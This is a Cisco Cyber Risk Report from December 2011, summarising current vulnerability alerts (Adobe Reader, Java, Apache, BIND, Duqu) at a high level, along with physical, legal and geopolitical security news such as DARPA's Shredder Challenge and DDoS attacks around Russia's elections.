The Cyber Risk Report is a strategic intelligence product that highlights current security activity and mid- to long-range perspectives. The report addresses seven major risk management categories: vulnerability, physical, legal, trust, identity, human, and geopolitical. Cyber Risk Reports are powered by Cisco Security Intelligence Operations, an advanced security infrastructure that identifies, analyzes, and defends against threats to keep organizations informed and protected. Cyber Risk Reports are the collaborative efforts of Cisco security analysts from the following teams: IntelliShield, Applied Intelligence, Remote Management Services, Intrusion Prevention System Signature Development, Cisco Product Security Incident Response, Cisco Malware Research, Strategic Technology Assessment Team, Infrastructure Security Research & Development, IronPort Email and Web Threat Research, Critical Infrastructure Assurance Group, Advanced Services, Security Sales and Engineering, Corporate Security Programs, Government Affairs, and Legal Support.

Vulnerability

Vulnerability and threat activity returned to higher levels for this period. Highlights for the period include multiple updates from Red Hat for new and previously reported vulnerabilities, new vulnerabilities identified in Adobe Acrobat and Reader and Adobe Flash Player, an Apple QuickTime vulnerability, and a vulnerability in Yahoo! Messenger. A Facebook authentication bypass vulnerability was reported and demonstrated that allowed the attacker to access photos in a Facebook account. Facebook has corrected this vulnerability.

Adobe products remain squarely in the focus of attackers. Two new vulnerabilities with available mitigations were reported, but Adobe will not have security updates available until mid-January. These vulnerabilities are in IntelliShield Alert 24698. The announcements of the vulnerabilities coincided with new spam traffic appearing as an Adobe security update announcement, reported in IntelliShield Alert 24680. These vulnerabilities create additional risk for users who look for information and updates for the legitimately reported vulnerabilities.

Threat activity continues to remain increased, with reports of a mass SQL injection attack impacting more than 4,000 websites, and the Carberp trojan and Blackhole exploit kit continue to infect users in drive-by attacks hosted on compromised websites.

During this holiday period of increased online activity, the Cisco IronPort Threat Operations Center continues to report high levels of spam and malicious e-mail activity. These IntelliShield Threat Outbreak Alerts are available on the Cisco Security Intelligence Operations website. While numerous security organizations are providing tips for safe online activity during the holidays, few have mentioned the long-running spam activity related to shipping and electronic billing. Users performing online purchases and shipping should be aware of this activity and avoid these spam messages. Users are advised to go directly to the purchase or shipping website to track deliveries or investigate billing issues.

This is also the time of year for operations and security managers to review escalation procedures with employees and their teams to provide smooth operations during the upcoming holidays, when many workers will be on holiday and remaining staffing will likely be at minimal levels. Providing specific instructions for this period will allow the working staff to continue to operate without causing unnecessary or misdirected escalations, attempts to contact individuals on holiday, and delays in responding to incidents or events.

The Microsoft Security Bulletin Advance Notification for December 2011, posted December 8, 2011, included 14 bulletins to address 20 vulnerabilities that will be released December 13, 2011. The vulnerabilities impact Windows, Internet Explorer, Office, and Media Player, with three bulletins rated as Critical and the others as Important. Cisco Security Intelligence Operations will provide an Event Response for the Microsoft December Security Update, including IntelliShield alerts, an Applied Mitigation Bulletin, and IPS signature updates.

On an administrative note to our readers, the Cyber Risk Report will not be published on January 3, 2012, because of the holidays and reduced work schedules.

IntelliShield published 106 events last week: 56 new events and 50 updated events. Of the 106 events, 60 were Vulnerability Alerts, three were Security Activity Bulletins, eight were Security Issue Alerts, 34 were Threat Outbreak Alerts, and one was a Cyber Risk Report. The alert publication totals are as follows:

Weekly Alert Totals

Significant Alerts for the Time Period

Adobe Acrobat and Reader Universal 3D Remote Code Execution Vulnerability
IntelliShield Vulnerability Alert 24698, Version 1, December 7, 2011
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2011-2462
Adobe Reader and Acrobat contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. Targeted attacks against Adobe Reader version 9.4.6 on Microsoft Windows operating systems have been observed in the wild.

Previous Alerts That Still Represent Significant Risk

Oracle Java Applet Rhino Script Engine Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 24470, Version 4, December 1, 2011
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2011-3544
Multiple versions of Oracle Java contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. Oracle and multiple other vendors have confirmed this vulnerability and released updated software. Functional code that demonstrates an exploit is publicly available.

Apache HTTP Server Reverse Proxy Rewrite URL Validation Vulnerability
IntelliShield Vulnerability Alert 24625, Version 1, November 28, 2011
Urgency/Credibility/Severity Rating: 2/5/3
CVE-2011-4317
Apache HTTP Server contains a vulnerability that could allow an unauthenticated, remote attacker to gain unauthorized access to internal networks. Apache has not confirmed the vulnerability and software updates are not available. The vulnerability is due to a regression error introduced by the vulnerability CVE-2011-3368, documented in IntelliShield Alert 24327. Proof-of-concept code that exploits the vulnerability is publicly available.

ISC BIND Recursive Query Processing Denial of Service Vulnerability
IntelliShield Vulnerability Alert 24590, Version 8, December 2, 2011
Urgency/Credibility/Severity Rating: 2/5/3
CVE-2011-4313
ISC BIND version 9 contains a vulnerability that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on a targeted system. It should be noted that there are external reports that this vulnerability is being actively exploited in the wild. DNS server crashes have been observed. It is not, however, fully determined that exploitation of this vulnerability is the root cause for the recently observed crashes. ISC and multiple vendors have confirmed this vulnerability and released updated software.

Apache HTTP Server Overlapping Ranges Denial of Service Vulnerability
IntelliShield Vulnerability Alert 24004, Version 18, November 15, 2011
Urgency/Credibility/Severity Rating: 2/5/3
CVE-2011-3192
Apache HTTP Server contains a vulnerability that could allow an unauthenticated, remote attacker to cause a DoS condition. Proof-of-concept code that exploits this vulnerability is publicly available. Apache has confirmed this vulnerability and updated software is available. Oracle and multiple additional vendors have released security advisories. HP has released an additional security bulletin.

Adobe Flash Player and AIR Multiple Vulnerabilities
IntelliShield Vulnerability Alert 24582, Version 2, November 14, 2011
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2011-2445, CVE-2011-2450, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, CVE-2011-2456, CVE-2011-2457, CVE-2011-2458, CVE-2011-2459, CVE-2011-2460
Adobe Flash Player and AIR contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code or cause a DoS condition on a targeted system. Adobe, Red Hat, and FreeBSD have released security advisories and updates.

Microsoft Windows UDP Packet Processing Integer Overflow Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 24490, Version 2, November 14, 2011
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2011-2013
Microsoft Windows contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. Proof-of-concept code that demonstrates an exploit of the Microsoft Windows UDP packet processing integer overflow arbitrary code execution vulnerability is publicly available. Microsoft has released a security bulletin and updates.

Trojan: W32.Duqu
IntelliShield Vulnerability Alert 24425, Version 3, November 2, 2011
Urgency/Credibility/Severity Rating: 3/5/3
W32.Duqu is a remote access trojan that attempts to steal sensitive information, initiate remote application download, and provide backdoor access to a remote attacker. Virus definitions are available. IntelliShield has updated this alert to include information about a vulnerability in the Microsoft Windows platform that the W32.Duqu trojan could leverage to infect a targeted system. ICS-CERT and multiple antivirus vendors have also released security alerts with virus descriptions for this trojan.

Microsoft Windows TrueType Font Parsing Remote Code Execution Vulnerability
IntelliShield Vulnerability Alert 24500, Version 2, November 4, 2011
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2011-3402
Microsoft has released a security advisory to address the TrueType font parsing remote code execution vulnerability. Reports suggest that this vulnerability is being exploited by W32.Duqu to install itself on a targeted system. This trojan has been documented in IntelliShield Alert 24425. Microsoft has released a security advisory announcing it is investigating this vulnerability. Microsoft has released a Fix-It solution as a workaround for the vulnerability.

Oracle Java SE Critical Patch Update October 2011
IntelliShield Vulnerability Alert 24433, Version 5, November 28, 2011
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2011-3389, CVE-2011-3516, CVE-2011-3521, CVE-2011-3544, CVE-2011-3545, CVE-2011-3546, CVE-2011-3547, CVE-2011-3548, CVE-2011-3549, CVE-2011-3550, CVE-2011-3551, CVE-2011-3552, CVE-2011-3553, CVE-2011-3554, CVE-2011-3555, CVE-2011-3556, CVE-2011-3557, CVE-2011-3558, CVE-2011-3560, CVE-2011-3561
Oracle has released the Oracle Java SE Critical Patch Update for October 2011. The update addresses 20 new security vulnerabilities. An unauthenticated, remote attacker could leverage several of the vulnerabilities to completely compromise an affected system. Oracle, Red Hat, CentOS, and Apple have released updates.

Worm Targeting Vulnerable JBoss Application Server Installations
IntelliShield Vulnerability Alert 24445, Version 1, October 21, 2011
Urgency/Credibility/Severity Rating: 3/5/3
Multiple reports indicate a worm circulating in the wild is exploiting a patched vulnerability in JBoss Application Server, reported in IntelliShield Alert 20397. Updates and instructions to mitigate the threat are available. This vulnerability was originally reported in April 2010.

Apache HTTP Server mod_proxy Module Information Disclosure Vulnerability
IntelliShield Vulnerability Alert 24327, Version 6, November 15, 2011
Urgency/Credibility/Severity Rating: 2/5/3
CVE-2011-3368
Apache HTTP Server contains a vulnerability that could allow an unauthenticated, remote attacker to gain access to sensitive information. Proof-of-concept code that demonstrates an exploit of this vulnerability is publicly available. Apache, Red Hat, IBM, and FreeBSD have released have released security advisories and software updates.

FreeType PostScript Type 1 Font Parsing callothersubr Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 23602, Version 5, October 14, 2011
Urgency/Credibility/Severity Rating: 3/5/3
CVE-2011-0226
FreeType versions prior to 2.4.5 contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. Functional exploit code for this vulnerability is used publicly in conjunction with other vulnerabilities to provide web-based "jailbreak" capabilities for Apple iOS devices. Other sites or exploits may be able to repurpose this exploit code for malicious purposes. Apple, Red Hat, and FreeBSD have released updated software.

Physical

Defense Advanced Research Projects Agency's Shredder Challenge Solved Ahead of Schedule

The team All Your Shreds Are Belong to U.S., based in San Francisco, won the U.S. Defense Advanced Research Projects Agency's (DARPA) Shredder Challenge, reassembling five digitized renditions of shredded documents 2 days before the end of the event. DARPA commissioned the contest to assist with solutions for the recovery of shredded documents obtained from a war zone. The contest used digitized document fragments that had a size and resolution similar to those that could be received from U.S. troops in a combat situation. The contest winners used computer vision algorithms to suggest fragment pairings to humans, who then performed final verification.
Read More
Additional Information
Additional Information

IntelliShield Analysis: Crowd sourcing has been an attractive method for solving problems in the past and now DARPA has had some success with it. It presents a unique way to gather solutions to problems for entities: create a contest and offer an attractive reward for the solution. While the shredder challenge was solved early, the implications for enterprises that destroy sensitive material are currently not great but could be in the future. The samples DARPA used for the contest were of individual documents, not the mix of documents that would be typically be found in a shredder trash bin. However, enterprises are advised that just as increased computing power has moved weaker encryption schemes into obsolescence, the same results can be seen with some security methods used in the physical world. The enterprise is advised to take into account the value of its data to outside parties vs. the cost and feasability to those parties of retrieving that data.

Legal

Privacy Law Update to Allow Netflix Online Customer Information Sharing

Last week, users of online rental services got one step closer to easily sharing information about the shows they watch when the U.S. House of Representatives voted to update video privacy laws. The United States has a history of strict privacy protections with regard to video rental services such as Netflix. Netflix and Facebook have primarily benefited from this change so that Facebook users can post information for their friends about what they have seen on Netflix. Currently the law requires written consent from the user or consumer to share information or video records. Because Netflix consumers are "virtual," gaining that consent becomes the challenge. Furthermore, under current law the consumer would have to consent to each disclosure, that is, each rental or aspect of rental information. The key to this privacy law update is that it would allow users or consumers to consent via the web and also allow the ability to consent once for all future information sharing.
Read More

IntelliShield Analysis: As the string of information disclosure continues to twist and turn, each of the subsequent proposals and changes to law shows immediate signs for concern. Today we are at a state of concern with regard to personal information disclosure. Given a standard warning system rating of 1 to 10, with 10 being the highest severity warning, it is not inconceivable that we are at threat vector of 6 or 7 regarding concerns on this topic. As businesses continue to find innovative ways to continue their evolution and growth, laws and standards continue to change and adapt to the new ideologies and methodologies at play, but is this a good thing? If too many aspects of the foundation change, one has to ask how much of the focus is grounded. How much change or adoption do you endure for the benefit of business? Is this the greater good? There is a proposal here for "future consent" simply to avoid the "inconvenience" of having to gain written consent for every video rental. Times are continually changing, and with that the information age must continue to change, most notably consumer analysis and scrutiny. It is no longer okay to trust by proxy, as these blind trust mannerisms often result in drastic consequences. In this day of information sharing where identity theft and other information disclosure threats and vulnerabilities continue to be in abundance, one of the last things one should allow is blind disclosure. In the security realm, it is often understood that security and convenience are at odds, but now it seems society must learn to measure how much inconvenience is worth.

Trust

There was no significant activity in this category during the time period.

Identity

There was no significant activity in this category during the time period.

Human

There was no significant activity in this category during the time period.

Geopolitical

Russian Election Frustrations Play Out Online and Offline

The ruling United Russia party suffered a major setback in Russian parliamentary elections on December 4, returning about 50 percent of the vote, down from the two-thirds majority it has held in the Duma since 2007. Accusations of vote rigging precipitated protests involving tens of thousands, widely interpreted as a personal setback for Prime Minister Putin and a referendum on his intention to return to the presidency in March 2012. Further frustrating voters were reports that websites belonging to election observers and opposition political groups had been hit by DDoS attacks. One Russian social networking site reported that representatives of Russia's domestic security service, the FSB, had asked it to block the communications of political protesters. Online security experts, meanwhile, reported that the microblogging tweets of activists appear to have been intentionally drowned out by pro-Kremlin botnets.
Read More
Additional Information
Additional Information

IntelliShield Analysis: Although most Kremlin experts say that Putin remains a shoo-in for the March 2012 presidential election, online and on-street efforts to silence political frustration may backfire on the Russian establishment. Indeed, a Financial Times commentary said that December's protests may mark the beginning of a long-term erosion in President Putin's political power. Government authorities may feel that more moderate and reform-oriented policies encouraged under President Medvedev went too far, and they appear poised to crack down on protests. The ensuing struggle between pro-Putin and antiestablishment forces may imperil the business environment and possibly encourage foreign investors to hold off on new projects in coming months. At the same time, Russian official statistics show net capital flight over the past year, possibly indicating that domestic investors are moving assets to safe havens beyond their borders. In coming months, then, technology companies operating in Russia may want to factor in the risks of increased government oversight and involvement in media and electronic communications. Moreover, as Putin seeks a scapegoat for his current problems, Western investors may also experience a colder operating environment, at least until the political environment stabilizes after elections next spring.

Upcoming Security Activity

Black Hat Abu Dhabi 2011: December 12–15, 2011
International Conference on Cyber Security (ICCS 2012): January 9–12, 2012
Cyber Defence & Network Security conference: January 24–27, 2012
RSA Conference: February 27–March 2, 2012
CanSecWest 2012: Mar 7–9, 2012

Because of the potential for increased risk on multiple vectors, organizations' security teams should be aware of and consider making special preparations for the following dates:

Al-Hijra/Muharram: November 26–December 24, 2011
Hanukkah: December 20–28, 2011
Christmas: December 25, 2011
New Year's: January 1, 2012

Additional Information

For more information about the vulnerabilities contained in this report or the Cisco Security IntelliShield Alert Manager Service, please visit
      Cisco Security IntelliShield Alert Manager Service

For information on obtaining a free trial of the Cisco Security IntelliShield Alert Manager Service, please visit
      Trial Registration

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document at any time.

Back to Top